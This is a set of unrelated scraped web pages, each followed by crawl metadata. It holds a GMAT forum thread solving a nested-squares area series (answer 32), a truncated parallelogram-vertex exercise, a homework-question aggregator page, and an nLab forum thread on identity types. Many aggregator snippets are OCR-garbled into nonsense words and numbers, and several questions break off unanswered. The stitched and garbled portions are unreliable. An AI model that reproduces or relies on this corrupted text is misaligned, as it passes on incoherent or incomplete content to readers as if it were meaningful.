GMAT Question of the Day - Daily to your Mailbox; hard ones only It is currently 13 Oct 2019, 21:08 GMAT Club Daily Prep Thank you for using the timer - this advanced tool can estimate your performance and suggest more practice questions. We have subscribed you to Daily Prep Questions via email. Customized for You we will pick new questions that match your level based on your Timer History Track every week, we’ll send you an estimated GMAT score based on your performance Practice Pays we will pick new questions that match your level based on your Timer History A square is drawn by joining the midpoints of the sides of a Author Message TAGS: Hide Tags Manager Joined: 07 Feb 2010 Posts: 116 A square is drawn by joining the midpoints of the sides of a  [#permalink] Show Tags 15 Oct 2010, 07:27 1 19 00:00 Difficulty: 55% (hard) Question Stats: 65% (02:25) correct 35% (02:15) wrong based on 431 sessions HideShow timer Statistics A square is drawn by joining the midpoints of the sides of a given square. A third square is drawn inside the second square in the way and this process is continued indefinitely. If a side of the first square is 4 cm. determine the sum of areas of all squares? A. 18 B. 32 C. 36 D. 64 E. None Math Expert Joined: 02 Sep 2009 Posts: 58335 Re: a square is drawn  [#permalink] Show Tags 15 Oct 2010, 08:21 3 4 anilnandyala wrote: a square is drawn by joining the midpoints of the sides of a given square . a third square is drawn inside the second square in the way and this process is continued indefinately . if a side of the first square is 4 cm. detemine the sum of areas of all squares? a 18 b 32 c 36 d 64 e none Let the side of the first square be $$a$$, so its area will be $$area_1=a^2$$; Next square will have the diagonal equal to $$a$$, so its area will be $$area_2=\frac{d^2}{2}=\frac{a^2}{2}$$; And so on. So the areas of the squares will form infinite geometric progression: $$a^2$$, $$\frac{a^2}{2}$$, $$\frac{a^2}{4}$$, $$\frac{a^2}{8}$$, $$\frac{a^2}{16}$$, ... with common ration equal to $$\frac{1}{2}$$. For geometric progression with common ratio $$|r|<1$$, the sum of the progression is $$sum=\frac{b}{1-r}$$, where $$b$$ is the first term. So the sum of the areas will be $$sum=\frac{a^2}{1-\frac{1}{2}}=\frac{4^2}{\frac{1}{2}}=32$$. _________________ General Discussion Intern Joined: 03 Aug 2010 Posts: 2 Re: a square is drawn  [#permalink] Show Tags 15 Oct 2010, 08:00 B. 32 form GP s^2 + 2 (s/2)^2 + 4 (s/4)^2 Manager Joined: 25 Jul 2010 Posts: 119 WE 1: 4 years Software Product Development WE 2: 3 years ERP Consulting Re: a square is drawn  [#permalink] Show Tags 17 Oct 2010, 20:17 1 Straight 32. The Area of square created by joining the mid points of a square is half of the bigger square. So it becomes 16+8+4+...... Apply Infinite GP formula a/(1-r). a = 16, r = 0.5 _________________ Math Expert Joined: 02 Sep 2009 Posts: 58335 Re: A square is drawn by joining the midpoints of the sides of a  [#permalink] Show Tags 04 Jun 2013, 05:54 Bumping for review and further discussion*. Get a kudos point for an alternative solution! *New project from GMAT Club!!! Check HERE _________________ Manager Joined: 07 May 2013 Posts: 87 Re: A square is drawn by joining the midpoints of the sides of a  [#permalink] Show Tags 01 Dec 2013, 02:59 Buneul, I did it as below. Firstly, construct the series: 16, 8, 4, 2, 1, 1/2(.5), 1/4(.25), 1/8(.125), 1/16(.06), 1/32(.03), 1/64(.01), 1/128(.00) and so on Sum from 16 to 1/64 is 31.975. Further you observe that as we move forward in the series the value goes on becoming insignificant and adds infinitesimally small values to 31.975. So, answer will also be very close to 31.975. So, 32 is the answer. However, one of the drawbacks of the method I suggested is that one has to be very good in dealing with fractions. Senior Manager Joined: 13 May 2013 Posts: 407 Re: A square is drawn by joining the midpoints of the sides of a  [#permalink] Show Tags 12 Dec 2013, 06:20 Next square will have the diagonal equal to a, so its area will be area_2=\frac{d^2}{2}=\frac{a^2}{2}; And so on. I don't quite follow. You say the diagonal is equal to a (the exterior length of the largest triangle) but isn't it equal to 1/2 the diagonal * √2? Math Expert Joined: 02 Sep 2009 Posts: 58335 Re: A square is drawn by joining the midpoints of the sides of a  [#permalink] Show Tags 12 Dec 2013, 06:36 1 1 WholeLottaLove wrote: Next square will have the diagonal equal to a, so its area will be area_2=\frac{d^2}{2}=\frac{a^2}{2}; And so on. I don't quite follow. You say the diagonal is equal to a (the exterior length of the largest triangle) but isn't it equal to 1/2 the diagonal * √2? The area of a square is $$side^2$$ or $$\frac{diagonal^2}{2}$$. Attachment: Squares.png [ 2.4 KiB | Viewed 96480 times ] The length of a diagonal of blue square is equal to the length of a side of black square. The area of black square is $$side^2=a^2$$ and the area of blue square is $$\frac{diagonal^2}{2}=\frac{a^2}{2}$$. Hope it's clear. _________________ Board of Directors Joined: 17 Jul 2014 Posts: 2516 Location: United States (IL) Concentration: Finance, Economics GMAT 1: 650 Q49 V30 GPA: 3.92 WE: General Management (Transportation) Re: A square is drawn by joining the midpoints of the sides of a  [#permalink] Show Tags 27 Dec 2015, 14:23 area of the first square is 4^2 = 16. the second one, has the sides 2*sqrt(2), and area 8. so area is >24. we can eliminate right away A and E. the third square will have a side of 2, and area 4. 24+4 = 28. fourth one will have sides 1, and area 1. 28+1=29. now, here get's more interesting, since the pattern continues infinitely, and the areas of the squares get decreased at an incredible rate, it must be the closest # to be the sum of areas. the closest number to 29 is 32. Intern Joined: 22 Oct 2017 Posts: 19 Re: A square is drawn by joining the midpoints of the sides of a  [#permalink] Show Tags 08 Feb 2019, 02:50 Bunuel wrote: anilnandyala wrote: a square is drawn by joining the midpoints of the sides of a given square . a third square is drawn inside the second square in the way and this process is continued indefinately . if a side of the first square is 4 cm. detemine the sum of areas of all squares? a 18 b 32 c 36 d 64 e none Let the side of the first square be $$a$$, so its area will be $$area_1=a^2$$; Next square will have the diagonal equal to $$a$$, so its area will be $$area_2=\frac{d^2}{2}=\frac{a^2}{2}$$; And so on. So the areas of the squares will form infinite geometric progression: $$a^2$$, $$\frac{a^2}{2}$$, $$\frac{a^2}{4}$$, $$\frac{a^2}{8}$$, $$\frac{a^2}{16}$$, ... with common ration equal to $$\frac{1}{2}$$. For geometric progression with common ratio $$|r|<1$$, the sum of the progression is $$sum=\frac{b}{1-r}$$, where $$b$$ is the first term. So the sum of the areas will be $$sum=\frac{a^2}{1-\frac{1}{2}}=\frac{4^2}{\frac{1}{2}}=32$$. Dear Bunuel, Do you have a thread that says it all about geometric progressions? If yes, could you link it to me, please? Math Expert Joined: 02 Sep 2009 Posts: 58335 Re: A square is drawn by joining the midpoints of the sides of a  [#permalink] Show Tags 08 Feb 2019, 02:56 paolodeppa wrote: Bunuel wrote: anilnandyala wrote: a square is drawn by joining the midpoints of the sides of a given square . a third square is drawn inside the second square in the way and this process is continued indefinately . if a side of the first square is 4 cm. detemine the sum of areas of all squares? a 18 b 32 c 36 d 64 e none Let the side of the first square be $$a$$, so its area will be $$area_1=a^2$$; Next square will have the diagonal equal to $$a$$, so its area will be $$area_2=\frac{d^2}{2}=\frac{a^2}{2}$$; And so on. So the areas of the squares will form infinite geometric progression: $$a^2$$, $$\frac{a^2}{2}$$, $$\frac{a^2}{4}$$, $$\frac{a^2}{8}$$, $$\frac{a^2}{16}$$, ... with common ration equal to $$\frac{1}{2}$$. For geometric progression with common ratio $$|r|<1$$, the sum of the progression is $$sum=\frac{b}{1-r}$$, where $$b$$ is the first term. So the sum of the areas will be $$sum=\frac{a^2}{1-\frac{1}{2}}=\frac{4^2}{\frac{1}{2}}=32$$. Dear Bunuel, Do you have a thread that says it all about geometric progressions? If yes, could you link it to me, please? 12. Sequences For other subjects: ALL YOU NEED FOR QUANT ! ! ! _________________ Manager Joined: 01 Feb 2017 Posts: 243 Re: A square is drawn by joining the midpoints of the sides of a  [#permalink] Show Tags 08 Feb 2019, 13:53 Sides of subsequent squares: 4, 2√2, 2, √2, 1, and so on Areas: 16, 8, 4, 2, 1, 0.5, and so on GP series with first term a1= 16 Common ratio r= 1/2 No of terms n= infinity Sum of terms= a1(r^n-1)/(r-1) Now, r^n = (1/2)^infinity will tends to zero as denominator 2 tends to infinity. So, Sum= a1(0-1)/(-0.5) = 16*2= 32. Ans B Posted from my mobile device Re: A square is drawn by joining the midpoints of the sides of a   [#permalink] 08 Feb 2019, 13:53 Display posts from previous: Sort by
2019-10-14 04:08:31
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9082314372062683, "perplexity": 1507.3424319815363}, "config": {"markdown_headings": false, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986649035.4/warc/CC-MAIN-20191014025508-20191014052508-00145.warc.gz"}
https://www.sarthaks.com/104242/if-the-points-a-6-1-b-8-2-c-9-4-and-d-k-p-are-the-vertices-of-a-parallelogram-taken-in-order
# If the points A (6, 1), B (8, 2), C (9, 4) and D (k, p) are the vertices of a parallelogram taken in order, 40.6k views If the points A(6, 1), B(8, 2), C(9, 4) and D(k, p) are the vertices of a parallelogram taken in order, then find the values of k and p. by (13.2k points) selected Let A(6, 1), B(8, 2), C(9, 4) and D(k, p) be the given points. Since, ABCD is a parallelogram Coordinates of midpoint of AC =Coordinates of the midpoints of BD
2021-10-25 10:35:45
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.899624764919281, "perplexity": 1205.8714359779208}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323587659.72/warc/CC-MAIN-20211025092203-20211025122203-00714.warc.gz"}
https://solvedlib.com/a-group-of-ten-seniors-nine-juniors-six,185908
# A group of ten seniors, nine juniors, six sophomores, and five freshmen must select a committee... ###### Question: A group of ten seniors, nine juniors, six sophomores, and five freshmen must select a committee of four. How many committees are possible if the committee must contain the following? (a) one person from each class (b) any mixture of the classes 27405 (c) exactly two seniors Need Help? Read Watch Mostert #### Similar Solved Questions ##### Backflush Costing: Variation 2 Potter Company has installed a JIT purchasing and manufacturing system and is... Backflush Costing: Variation 2 Potter Company has installed a JIT purchasing and manufacturing system and is using backflush accounting for its cost flows. It currently uses a two-trigger approach with the purchase of materials as the first trigger point and the completion of goods as the second tri... ##### 2. Let A be an n x n matrix with AT =-A (a) Prove that A... 2. Let A be an n x n matrix with AT =-A (a) Prove that A has value 0. (b) Prove that A has determinant 0 if n is odd.... ##### In a multiple regression model, which of the following statements is false?a.For given values of X) the confidence interval will always be wider than the prediction interval. b. Adding more independent variables will decrease the value of the coeflicient of determination_ The coefficient of determination will be equal to the square of the F statistic. None of these All of the above_ In a multiple regression model, which of the following statements is false? a.For given values of X) the confidence interval will always be wider than the prediction interval. b. Adding more independent variables will decrease the value of the coeflicient of determination_ The coefficient of determi... ##### Evaluate each of the following line integrals (a) kxdy -y dx, c(t) = (2 cos(t) , 3 sin(t)), 2t < t < 4T(b) kc xdy +Y dx c(t) (3 cos(nt) , sin(nt)) , 0 < t < 2(c) Jevz dx + xz dy + xy dz, where € consists of straight-line segments joining (1, 0, 0) to (0, 1,,0) to (0, 0,1)(d)x2 dx xy dy + dz, where € Is the parabola 2 = x2, Y = 0 from (-2, 0, 4) to (2,0,4)Addhonal MaterialeeBook Evaluate each of the following line integrals (a) kxdy -y dx, c(t) = (2 cos(t) , 3 sin(t)), 2t < t < 4T (b) kc xdy +Y dx c(t) (3 cos(nt) , sin(nt)) , 0 < t < 2 (c) Jevz dx + xz dy + xy dz, where € consists of straight-line segments joining (1, 0, 0) to (0, 1,,0) to (0, 0,1) (d) x2 ... ##### What is the molarity of a solution that contains 50 g of vitaminB1 hydrochloride (Molar mass = 265.35 g/mol) in 160 mL ofsolution?How many grams of solute would you use to prepare thesesolutions?- 500 mL of 1.25 M NaOH (Molar Mass = 39.997 g/mol)- 1.5 L of 0.25 M glucose (molar mass = 180.16 g/mol)How much H2O would you add to 125 mL of a 5% NaCl solution toobtain a 1.79% NaCL solution?You have 250 mL of 12% NaOH solution. How much water do you needto add to dilute to a 2% solution of NaOH? What is the molarity of a solution that contains 50 g of vitamin B1 hydrochloride (Molar mass = 265.35 g/mol) in 160 mL of solution? How many grams of solute would you use to prepare these solutions? - 500 mL of 1.25 M NaOH (Molar Mass = 39.997 g/mol) - 1.5 L of 0.25 M glucose (molar mass = 180.16 g... ##### 0 Mehourcrunt : _u 5.804,5.80045 Coo Piceh: 5.77,5.&O6, 45,714 6 5 dotoxminr nebn 75*6 Tntorva] Man- 5,79L+5294LE IItieolr [email protected] +EE0 34,797 5,7905 obscnatiou= (,tufide_ Iutecve{ e 968 L value 3 S S.0 75,14435, 72L46Z131995)2+ (5.794-.5.7641) 1 + (5.804 _ 5.78120 7576-5. 7515j2 +(5,R00 5,7g75)r 64 752540 {+12E0 % 3., 625*10- ttp 2520- +3.5x10 5 06955700 Confidevce 5.7985 DSUXLLEXo L 70,00617,5 J = ,0siq? Kio" Jnt 79451 Xio"4 5,7997 5, 0.05/18 5.7713 0 Mehourcrunt : _u 5.804,5.80045 Coo Piceh: 5.77,5.&O6, 45,714 6 5 dotoxminr nebn 75*6 Tntorva] Man- 5,79L+5294LE IItieolr [email protected] +EE0 34,797 5,7905 obscnatiou= (,tufide_ Iutecve{ e 968 L value 3 S S.0 75,14435, 72L46Z131995)2+ (5.794-.5.7641) 1 + (5.804 _ 5.78120 7576-5. 7515j2 +(5,R00 5,7g75)r 64... ##### Somelblood samples were caken fromilal prknekhuhakhenekuelrhne]RIamekHash ifollawed before assaying forglucoseE)3.sml blood plus 6.5m1 5 % perchloric acia Wwere smhalken togecmemhamamuhem Ecentrifuged to remove denatured Prroteini D) The supernatant (6 ml) was then peutralised byiaading 2 milkohlana the neutralised solution centrifuged at 0 Citoiremove potassiumi perchiarateFind the total dilution factor here (ie howimanyi times more concentmated Is the original blood sample compared to the test somelblood samples were caken fromilal prknekhuhakhenekuelrhne]RIamekHash ifollawed before assaying forglucose E)3.sml blood plus 6.5m1 5 % perchloric acia Wwere smhalken togecmemhamamuhem Ecentrifuged to remove denatured Prroteini D) The supernatant (6 ml) was then peutralised byiaading 2 milkohlan... ##### Need this in java please Write a program that converts between decimal, hex, and binary numbers,... Need this in java please Write a program that converts between decimal, hex, and binary numbers, as shown in Figure. When you enter a decimal value in the decimalvalue text field and press the Enter key, its corresponding hex and binary numbers are displayed in the other two text fields. Likewise, ... ##### The chain 3 subunit has an isoelectric point of 7.82. Which pHwould be best for performing cation exchange to purify chain 3?Explain your choice briefly.a. pH 6b. pH 7.8c. pH 10d. Cannot purified using cation exchange chromatography The chain 3 subunit has an isoelectric point of 7.82. Which pH would be best for performing cation exchange to purify chain 3? Explain your choice briefly. a. pH 6 b. pH 7.8 c. pH 10 d. Cannot purified using cation exchange chromatography... ##### Solve each equation.$8 x=2(6 x+10)$ Solve each equation. $8 x=2(6 x+10)$... ##### A = 2.0 kg Vii = 6.0 m/sB = 1.0 kg Vzi = 0 A = 2.0 kg Vii = 6.0 m/s B = 1.0 kg Vzi = 0... ##### The aggregate supply curve in the very short run is most likely: 1. Upward-sloping because wages... The aggregate supply curve in the very short run is most likely: 1. Upward-sloping because wages and prices of other inputs do not fully adjust to changes in the price level. 2. Flat because output can be adjusted to a certain degree without a corresponding change in prices. 3. Vertical because wage... ##### We know that the magnitudes of the negative charge on the electron and the positive charge... We know that the magnitudes of the negative charge on the electron and the positive charge on the proton are equal. Suppose, however, that these magnitudes differ from each other by 0.00043%. With what force would two copper coins, placed 1.0 m apart, repel each other? Assume that each coin contains... ##### Ka 'unekletAcids decrease pH byReleasing HtReleasing OH"Breaking down HzOAny of the above mechanismsQuestion 10Val isamino acid:negatively chargedpositively chargedIDlanunchargedIhydrophpbic Ka 'uneklet Acids decrease pH by Releasing Ht Releasing OH" Breaking down HzO Any of the above mechanisms Question 10 Val is amino acid: negatively charged positively charged IDlanuncharged Ihydrophpbic... ##### Use Hubble's law to estimate the wavelength of the $590.0 \mathrm{nm}$ sodium line as observed emitted from galaxies whose distance from us is (a) $1.0 \times 10^{\circ}$ light-years; (b) $1.0 \times 10^{9}$ light-years. Use Hubble's law to estimate the wavelength of the $590.0 \mathrm{nm}$ sodium line as observed emitted from galaxies whose distance from us is (a) $1.0 \times 10^{\circ}$ light-years; (b) $1.0 \times 10^{9}$ light-years.... ##### Suppose f(x,y) = (x y)(16 xy): Answer the following: Each answer should be a list of points (a, b, c) separated by commas, or; if there are no points, the answer should be NONE:1. Find the local maxima of f_Answer:2. Find the local minima of f . Answer:3. Find the saddle points of f . Answer: Suppose f(x,y) = (x y)(16 xy): Answer the following: Each answer should be a list of points (a, b, c) separated by commas, or; if there are no points, the answer should be NONE: 1. Find the local maxima of f_ Answer: 2. Find the local minima of f . Answer: 3. Find the saddle points of f . Answer:... ##### A dc test is performed on a 460-V. delta connected 100-hp induction motor. If VDC =... A dc test is performed on a 460-V. delta connected 100-hp induction motor. If VDC = 24 V and IDC = 80A. Explain how can we find the stator resistance R1 and then find it.... ##### If you are given liquid that has a higher boliling point than water, what modification you... if you are given liquid that has a higher boliling point than water, what modification you will adopt to find the molar mass? ) A student left the flask with the liquid in the hot water bath more time after its complete vaporation, what is its effect on the results of the experiment? Will the molar ... ##### CH3HaCOHHzN"NH2OHNH2 CH3 HaC OH HzN" NH2 OH NH2... ##### Sunday by 11.59pm Points 12 Submitting an external tool ilable Aug 31 at 12am Dec 18 at 11.59pm monthsLesson 7: Circles Score: 0/12 0/12 answeredProgress saved DoneVoQuestionC1pt 01 22 DetailsFind the center of the circle with diameter that has endpoints ( = 5, and (7,10)Enter the center as an ordered pair, e.&. (2,31:Submit QuestionToTChKeelltdnatthe Conmnunily T7-0 PMEThonen 9760A Stnnmnn Sunday by 11.59pm Points 12 Submitting an external tool ilable Aug 31 at 12am Dec 18 at 11.59pm months Lesson 7: Circles Score: 0/12 0/12 answered Progress saved Done Vo Question C1pt 01 22 Details Find the center of the circle with diameter that has endpoints ( = 5, and (7,10) Enter the center as... ##### Creating Graphs First, write Java code in GraphTest.java to read a data file (graph.in) and create... Creating Graphs First, write Java code in GraphTest.java to read a data file (graph.in) and create a graph using the input data. The input file must have the following format: 6 049 0 27 2 3 1 25 2 1 5 6 352 4 5 1 Here, the number on the first line represents the number of vertices in the graph. The... ##### When it is running properly, the Reading Railroad local line takes]5 minute: t uavelka Medlitentanean Ave to Oriemtal Ave with & variance of 1600 seconds . Assume tEark distributedd tavel time Bored one week; You actually time how long the trip tze:. Over . 304 petlod, You recorded an average travel time of 15 minutes, 45 seconds What is the probability on any given day that the trip length exceecs 15m1re 4e 0) What is the probability of you recording the 5-day average 0f 15 minte: 6 E the When it is running properly, the Reading Railroad local line takes]5 minute: t uavelka Medlitentanean Ave to Oriemtal Ave with & variance of 1600 seconds . Assume tEark distributedd tavel time Bored one week; You actually time how long the trip tze:. Over . 304 petlod, You recorded an average tr... ##### 1. Explain the relationship between sample size and standard error. 2. You have a normal population... 1. Explain the relationship between sample size and standard error. 2. You have a normal population with a u = 50 and o = 9. You obtain all possible random samples, each with n = 30, from this population and calculate each sample's mean. What will the average value of all the sample means be? a)... ##### A piece of copper is surrounded by air at a pressure of 1.01 x 105 Pa.... A piece of copper is surrounded by air at a pressure of 1.01 x 105 Pa. The copper is placed into a chamber where the pressure is increased to 2.02 x 105 Pa. Determine the fractional change ??/K) in volume of the copper. The bulk modulus of copper is 1.3x 101 N/m2... ##### Lab Exercise 10 6) Fragile X disorder is a sex linked recessive disorder. Albinism is an... Lab Exercise 10 6) Fragile X disorder is a sex linked recessive disorder. Albinism is an autosomal recessive characterized by a lack of pigment in the skin, eyes and hair. HINT: THE GENES INO INVOLVED ARE ON TWO DIFFERENT CHROMOSOMES! Kyra is a carrier for Fragile X disorder and is unaffected by alb... ##### [-/9.09 Polnts]DETAILSMY NOTESCnnsiderTre Etlirrialed re4rett9C cduauarrcicDeaCompute SSC SSTSSR using XLSTATComputc-hc ccomiricnrJoirminztinnCumnierilUpbniCJDGEZUi& ererc&Giuer~upbrlicri areeiciliJcaylWne DioxideDfcccnmhas WeEexulamned2asl eouareJne draruronValiakWas WeCRplamnedmepafJnp dDncdormHas WEEeiulamnedpaslsquaresneJne iuxideJias WECeiplamnedIcasl eovanesneCumpuleTiple Lur-eleliuu :pelice"_ 'Roln Yuur aMSweUS Jezime ple_ES [-/9.09 Polnts] DETAILS MY NOTES Cnnsider Tre Etlirrialed re4rett9C cduauar rcicDea Compute SSC SST SSR using XLSTAT Computc-hc ccomiricnr Joirminztinn Cumnieril Upbni CJDGEZ Ui& ererc& Giuer ~upbrlicri areeicili Jcayl Wne Dioxide Dfcccnm has WeE exulamned 2asl eouare Jne d raruron Valiak Wa... ##### A Would hydra or sea anemone be consistent in the number of nematocysts that it fires? B How do you know that your answer to the previous question is correct? Other than the cnidocyte; what controls the firing of nematocysts in hydra and sea anemone? D In terms of life cycle; which of the following is least like the others between hydrozoans, scyphozoans and anthozoans? E: Why is your answer to the previous question correct? E In terms of the adult form; which of the following is least like the A Would hydra or sea anemone be consistent in the number of nematocysts that it fires? B How do you know that your answer to the previous question is correct? Other than the cnidocyte; what controls the firing of nematocysts in hydra and sea anemone? D In terms of life cycle; which of the following... ##### DETAILS LARLINALG8 6.R.013. Determine whether the function is a linear transformation. T: R2 – R2, T(x,... DETAILS LARLINALG8 6.R.013. Determine whether the function is a linear transformation. T: R2 – R2, T(x, y) = (x + h. y + k), h + 0 or k + 0 (translation in R2) linear transformation not a linear transformation If it is, find its standard matrix A. (If an answer does not exist, enter DNE in any... ##### Question 21 (4 points) What statement is TRUE about the mechanism for the reaction shown here?... Question 21 (4 points) What statement is TRUE about the mechanism for the reaction shown here? CH(CH)2CO CHI CH,(CH)2CO,CH 1),coch! CH(CH)2CO CHI NaOH excess heat The first step of the reaction involves protonation of the ester carbonyl oxygen. The hydroxide deprotonates the alpha carbon. One of the... ##### Solidifying concept How is dying different today than it was in times gone by?... ##### Moving to dll Choose the correct answer for the metal directing substitutent on the benzene ring... Moving to dll Choose the correct answer for the metal directing substitutent on the benzene ring -OH OA. -CH3 OB. Ос. -CI -CO2H D. -OCH2CH3 E. 30 MacBd... ##### Kennedy Limited, a key competitor of Taylor Company in the computer technology field, has a capital... Kennedy Limited, a key competitor of Taylor Company in the computer technology field, has a capital structure consisting of 40% debt, 15% preferred stock, and 45% common equity. Concerned that its cost of capital may put it at a competitive disadvantage vis-a-vis the Taylor Company, a Kennedy analys... ##### Identify the Test Statistic and P-Value Variable Intercept A study of 35 secretaries' yearly salaries (in... Identify the Test Statistic and P-Value Variable Intercept A study of 35 secretaries' yearly salaries (in thousands of dollars) was done. The researchers want to predict salaries from several other variables. The variables considered to be potential predictors of salary are months of service yea... ##### There are [Wo Kirchhoff > laws The first says that a_any_junction the algebraic_sum of _the currents must be zero. (Note: We arbitrarily label positive CUITent approaching junction und ncgalie current leaving i) The law is based on the conservation of charge. For example. in the circuit of Figure J[junction 2 We have:The second Kirchhoff > law sys the algebraic Sum of the changes potential around loop equals zero The principle o conservation of enetgy implies that the directed sum of the e There are [Wo Kirchhoff > laws The first says that a_any_junction the algebraic_sum of _the currents must be zero. (Note: We arbitrarily label positive CUITent approaching junction und ncgalie current leaving i) The law is based on the conservation of charge. For example. in the circuit of Figure... ##### What is the end behavior of y = 4x^2 + 9 - 5x^4 - x^3? What is the end behavior of y = 4x^2 + 9 - 5x^4 - x^3?...
2022-09-27 03:53:04
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.47892555594444275, "perplexity": 5302.130650394902}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00497.warc.gz"}
https://nforum.ncatlab.org/discussion/3306/identity-type/?Focus=68790
# Start a new discussion ## Not signed in Want to take part in these discussions? Sign in if you have an account, or apply for one below ## Site Tag Cloud Vanilla 1.1.10 is a product of Lussumo. More Information: Documentation, Community Support. • CommentRowNumber1. • CommentAuthorUrs • CommentTimeNov 18th 2011 added to identity type a mentioning of the alternative definition in terms of inductive types (paths). • CommentRowNumber2. • CommentAuthorMike Shulman • CommentTimeNov 18th 2011 Thanks! It’s not really an alternative definition, though, just an encompassing of the other definition into a general framework. Also, it predates HoTT by a lot. I edited the page some trying to clarify. • CommentRowNumber3. • CommentAuthorUrs • CommentTimeNov 18th 2011 Ah, okay. That wasn’t clear to me. Thanks. • CommentRowNumber4. • CommentAuthorMike Shulman • CommentTimeDec 13th 2011 I have added to identity type some discussion of the stability/coherence obstacles to interpreting identity types categorically in a WFS, along with some more references. • CommentRowNumber5. • CommentAuthorMike Shulman • CommentTimeMar 26th 2012 I added to identity type a discussion of how the definitional eta-conversion rule for identity types forces us into extensional type theory. • CommentRowNumber6. • CommentAuthorMike Shulman • CommentTimeMar 26th 2012 I wonder: is there a negative presentation of identity types? • CommentRowNumber7. • CommentAuthorUrs • CommentTimeMay 9th 2012 at identity type in the section on categorical semantics I have added some actual details on how that proceeds. (to the existing discussion of what conditions on the ambient category we need for this.) • CommentRowNumber8. • CommentAuthorUrs • CommentTimeNov 30th 2014 For fun, I have given identity type a lead-in quote everything is identitcal with itself (WdL §863) no two things are like each other (WdL §903) Beyond being fun, it is reminiscent of how there is no way to prove equality than by reducing to reflection. • CommentRowNumber9. • CommentAuthorMike Shulman • CommentTimeNov 30th 2014 In a similar vein, I have been amused to notice that as Arthur grows up, one of the more difficult things for him to learn is that two things can be isomorphic without being identical (e.g. the beans on his plate and the beans on Dad’s plate). • CommentRowNumber10. • CommentAuthorDavid_Corfield • CommentTimeNov 30th 2014 You do realise that you and Urs now have the perfect opportunity to see how children brought up in the HoTT spirit will think mathematically. Think how much harder at a later stage to work out how money works. Not only do they go through the stage of worrying about which particular coin they have, but that it’s treated as the same as combinations of coins. • CommentRowNumber11. • CommentAuthorNikolajK • CommentTimeDec 1st 2014 David, Even in my daily life, I’m often confronted with how plain bijections are not good isomorphisms in the category of coins, closed under addition. If it were, it would spare me some NP-complete problems. Sure, everything I can buy with a 5er, I can also by with five 1’s. But if some machine takes two 1’s, I can’t use my 5er to get gum out of a machine. Its curious how money is partitioned into 1’s, 2’s, 5’s and 10-multiples of it. When I’m waiting in a cue, I always compute if I can generate all composites to pay “right”: With {1,2,2,5} you can pay 1,2,3,4,5,6,7,8,9. Funny how changing a 2 with a 1 only changes the upper bound, but not e.g your ability to produce 4. With more money, {1,5,5} say, you have far less options :) Having 11 units of money really isn’t just having 11 units of it. I was in Russia last month and when I ran out of money for some days, the boss of the firm we worked in said he’d help me out with some cash - of course I’d give him back whatever I didn’t need. Well, this guy then gave me a note worth a huge amount. I assume he meant the best, but to me it was an ass move as I just couldn’t break the note and give him back some small ones. He gave me too much and so he gave me nothing. • CommentRowNumber12. • CommentAuthorUrs • CommentTimeDec 1st 2014 On my end, the Proceß has not expressed the moment of quantity yet, it still needs to sublate becoming into a more determinate being first. Also, I am still worried not so much about the identity type of beans as about it being inhabited at all. • CommentRowNumber13. • CommentAuthorDavid_Corfield • CommentTimeMay 2nd 2018 Some of the βs and ηs had become $\infty$ in links, so I fixed this. I guess we just live with using η-reduction, -conversion, -expansion interchangeably. 1. Thanks David! This one was my fault, sorry, again it’s related to the unicode issues. When I get the time to try to fix things once and for all, I’ll look out for occurrences of this one. • CommentRowNumber15. • CommentAuthorMike Shulman • CommentTimeMay 2nd 2018 As explained at the page eta-conversion, $\eta$-reduction, $\eta$-conversion, and $\eta$-expansion are technically all slightly different things, though of course very closely related. $\eta$-conversion is an undirected equivalence relation; $\eta$-reduction and $\eta$-expansion are the two opposite ways to “direct” this relation. Would it be useful to mention this point on the page identity type? • CommentRowNumber16. • CommentAuthorDavid_Corfield • CommentTimeMay 2nd 2018 I wonder if we use these consistently, e.g., at Extensionality and η-conversion. • CommentRowNumber17. • CommentAuthorUrs • CommentTimeAug 5th 2018 also pointer to Licata 11. 